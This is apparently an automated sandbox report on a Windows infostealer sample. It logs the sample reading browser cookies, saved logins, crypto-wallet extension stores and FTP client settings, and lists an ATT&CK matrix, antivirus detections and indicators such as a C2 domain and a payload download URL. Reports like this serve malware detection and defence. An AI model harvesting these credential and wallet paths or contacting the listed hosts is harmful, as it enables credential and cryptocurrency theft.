        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
        Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
        Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
        Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
        Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
        Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
        Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
        Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
        Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
        Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
        Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
        Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
        Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
        Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
        Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
        Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DUKNXICOZTJump to behavior
        Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DUKNXICOZTJump to behavior
        Source: Yara matchFile source: Process Memory Space: file.exe PID: 6908, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: Process Memory Space: file.exe PID: 6908, type: MEMORYSTR
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
        Windows Management Instrumentation
        1
        DLL Side-Loading
        12
        Process Injection
        34
        Virtualization/Sandbox Evasion
        2
        OS Credential Dumping
        761
        Security Software Discovery
        Remote Services1
        Archive Collected Data
        11
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        DLL Side-Loading
        12
        Process Injection
        LSASS Memory34
        Virtualization/Sandbox Evasion
        Remote Desktop Protocol41
        Data from Local System
        11
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
        Obfuscated Files or Information
        Security Account Manager2
        Process Discovery
        SMB/Windows Admin SharesData from Network Shared Drive3
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
        Software Packing
        NTDS1
        File and Directory Discovery
        Distributed Component Object ModelInput Capture114
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading
        LSA Secrets223
        System Information Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        file.exe45%ReversingLabsWin32.Trojan.Symmi
        file.exe100%AviraTR/Crypt.TPM.Gen
        file.exe100%Joe Sandbox ML
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://185.215.113.16/D0%Avira URL Cloudsafe
        https://property-imper.sbs:443/api&t0%Avira URL Cloudsafe
        https://property-imper.sbs:443/apig0%Avira URL Cloudsafe
        http://185.215.113.16/off/def.exeb0%Avira URL Cloudsafe
        https://property-imper.sbs/apiYRs78Oc0%Avira URL Cloudsafe
        https://property-imper.sbs/apiYRs78O0%Avira URL Cloudsafe
        https://property-imper.sbs/apiU0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        property-imper.sbs
        104.21.33.116
        truefalse
          high
          www.google.com
          172.217.21.36
          truefalse
            high
            s-part-0035.t-0009.t-msedge.net
            13.107.246.63
            truefalse
              high
              js.monitor.azure.com
              unknown
              unknownfalse
                high
                mdec.nelreports.net
                unknown
                unknownfalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://property-imper.sbs/apifalse
                    high
                    https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.jsfalse
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cfchromecache_112.12.drfalse
                        high
                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0file.exe, 00000003.00000003.1429856352.0000000005308000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://duckduckgo.com/chrome_newtabfile.exe, 00000003.00000003.1353449588.000000000534E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353605646.000000000534C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353514276.000000000534C000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://185.215.113.16/off/def.exebfile.exe, 00000003.00000003.1651025033.000000000530E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1640643368.0000000005302000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://duckduckgo.com/ac/?q=file.exe, 00000003.00000003.1353449588.000000000534E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353605646.000000000534C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353514276.000000000534C000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/chromecache_112.12.drfalse
                                high
                                https://www.linkedin.com/cws/share?url=$chromecache_92.12.dr, chromecache_104.12.drfalse
                                  high
                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000003.00000003.1353449588.000000000534E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353605646.000000000534C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353514276.000000000534C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://property-imper.sbs/apiUfile.exe, 00000003.00000003.1429856352.0000000005308000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://github.com/Youssef1313chromecache_112.12.drfalse
                                      high
                                      https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0chromecache_92.12.dr, chromecache_104.12.drfalse
                                        high
                                        https://aka.ms/msignite_docs_bannerchromecache_92.12.dr, chromecache_104.12.drfalse
                                          high
                                          https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9chromecache_104.12.drfalse
                                            high
                                            http://polymer.github.io/AUTHORS.txtchromecache_92.12.dr, chromecache_104.12.drfalse
                                              high
                                              https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.ymlchromecache_112.12.drfalse
                                                high
                                                https://management.azure.com/subscriptions?api-version=2016-06-01chromecache_92.12.dr, chromecache_104.12.drfalse
                                                  high
                                                  https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.mdchromecache_112.12.drfalse
                                                    high
                                                    https://property-imper.sbs/apiYRs78Ofile.exe, 00000003.00000003.1466792938.00000000005BC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1465202357.00000000005BC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1464672003.00000000005B4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1551875812.00000000005BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://x1.c.lencr.org/0file.exe, 00000003.00000003.1404322927.0000000005334000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://x1.i.lencr.org/0file.exe, 00000003.00000003.1404322927.0000000005334000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://aka.ms/pshelpmechoosechromecache_92.12.dr, chromecache_104.12.drfalse
                                                          high
                                                          https://aka.ms/feedback/report?space=61chromecache_112.12.dr, chromecache_113.12.drfalse
                                                            high
                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000003.00000003.1353449588.000000000534E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353605646.000000000534C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353514276.000000000534C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://property-imper.sbs:443/api&tfile.exe, 00000003.00000003.1465143401.00000000005A6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1551682514.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1485421825.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1640987678.00000000005A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1464928926.00000000005A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://property-imper.sbs/apiYRs78Ocfile.exe, 00000003.00000003.1484947321.00000000005AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1484646508.00000000005B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://185.215.113.16/off/def.exesfile.exe, 00000003.00000003.1640851103.0000000000580000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://learn-video.azurefd.net/vod/playerchromecache_92.12.dr, chromecache_104.12.drfalse
                                                                  high
                                                                  https://twitter.com/intent/tweet?original_referer=$chromecache_92.12.dr, chromecache_104.12.drfalse
                                                                    high
                                                                    https://github.com/gewarrenchromecache_112.12.drfalse
                                                                      high
                                                                      http://185.215.113.16/off/def.exepleWebKit/537.36file.exe, 00000003.00000002.1728895509.00000000001DA000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000003.00000003.1405435691.0000000005422000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://polymer.github.io/CONTRIBUTORS.txtchromecache_92.12.dr, chromecache_104.12.drfalse
                                                                            high
                                                                            https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.mdchromecache_112.12.drfalse
                                                                              high
                                                                              https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725chromecache_112.12.drfalse
                                                                                high
                                                                                https://client-api.arkoselabs.com/v2/api.jschromecache_92.12.dr, chromecache_104.12.drfalse
                                                                                  high
                                                                                  https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnlchromecache_92.12.dr, chromecache_104.12.drfalse
                                                                                    high
                                                                                    https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prevchromecache_92.12.dr, chromecache_104.12.drfalse
                                                                                      high
                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000003.00000003.1353449588.000000000534E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353605646.000000000534C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353514276.000000000534C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://github.com/Thrakachromecache_112.12.drfalse
                                                                                          high
                                                                                          http://polymer.github.io/PATENTS.txtchromecache_92.12.dr, chromecache_104.12.drfalse
                                                                                            high
